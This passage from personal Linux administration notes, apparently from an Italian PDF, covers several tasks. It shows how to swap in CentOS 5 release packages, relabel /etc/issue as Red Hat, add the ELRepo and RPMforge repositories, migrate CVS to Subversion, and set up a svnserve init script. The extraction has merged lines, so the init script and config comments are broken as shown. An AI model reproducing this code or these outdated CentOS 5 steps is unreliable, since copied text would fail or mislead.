http://mirrors.nl.kernel.org/centos/5/os/i386/CentOS/centos-release-5-2.el5.centos.i386.rpm

http://mirrors.nl.kernel.org/centos/5/os/i386/CentOS/centos-release-notes-5.2-2.i386.rpm

x86_64 (64 bit)

http://mirrors.nl.kernel.org/centos/5/os/x86_64/CentOS/centos-release-5-2.el5.centos.x86_64.rpm

http://mirrors.nl.kernel.org/centos/5/os/x86_64/CentOS/centos-release-notes-5.2-2.x86_64.rpm

4. To automatically inform about the updates in GUI, Do the following.

# nano /etc/yum/yum-updatesd.conf

In the file, type as follows under the section "# how to send notifications"

dbus_listener = yes

5. To change the OS name in the CLI login, Do the following.

# nano /etc/issue

Since we have installed the "centos-release" relates packages, the OS name will come as "CentOS

Page 173: Appunti Informatica

release 5 (Final)", so delete it and type

Red Hat Enterprise Linux Server release 5 (Tikanga)

Or any name you like.

6. Now your system is ready.

7. Read my guide on "CentOS Repositories"

AGGIUNGERE ANCHE

ELREPO.ORG (mhvtl)

rpm --import --httpproxy $httpproxy --httpport $httpport http://elrepo.org/RPM-GPG-KEY-elrepo.org

rpm -Uvh --httpproxy $httpproxy --httpport $httpport http://elrepo.org/elrepo-release-5-

4.el5.elrepo.noarch.rpm

DAG WIEERS

rpm -Uhv --httpproxy $httpproxy --httpport 81 http://apt.sw.be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge-

release-0.3.6-1.el5.rf.i386.rpm

Migrazione CVS2SVN

svnadmin create /home/svn/drams_analysis

cvs2svn --existing-svnrepos --encoding=latin_1 -s /home/svn/drams_analysis /home/cvs/cvsroot/DRAMS_Analysis/

(killare svnserve eventualmente)svnserve -d --listen-host 10.180.100.87 -r /home/svnvi /etc/rsnapshot.conf (aggiunto il backup)

svnserve startup script (redhat)

/etc/init.d/svnserve

#!/bin/bash## /etc/rc.d/init.d/subversion## Starts the Subversion Daemon## chkconfig: 2345 90 10# description: Subversion Daemon

# processname: svnserve

. /etc/rc.d/init.d/functions

[ -x /usr/bin/svnserve ] || exit 1

### Default variables. /etc/sysconfig/subversion

RETVAL=0prog="svnserve"

Page 174: Appunti Informatica

desc="Subversion Daemon"

start() { echo -n $"Starting $desc ($prog): " daemon $prog -d $OPTIONS RETVAL=$? [ $RETVAL -eq 0 ] && touch /var/lock/subsys/$prog echo }

stop() { echo -n $"Shutting down $desc ($prog): " killproc $prog RETVAL=$? [ $RETVAL -eq 0 ] && success || failure echo [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/$prog return $RETVAL }

case "$1" in start) start ;; stop) stop ;; restart) stop start RETVAL=$? ;; condrestart) [ -e /var/lock/subsys/$prog ] && restart RETVAL=$? ;; *) echo $"Usage: $0 {start|stop|restart|condrestart}" RETVAL=1 esac

exit $RETVAL

/etc/sysconfig/subversion

# Configuration file for the Subversion service## To pass additional options (for instace, -r root of directory to server) to the svnserve binary at startup, set OPTIONS here.##OPTIONS=OPTIONS="-r /home/svn"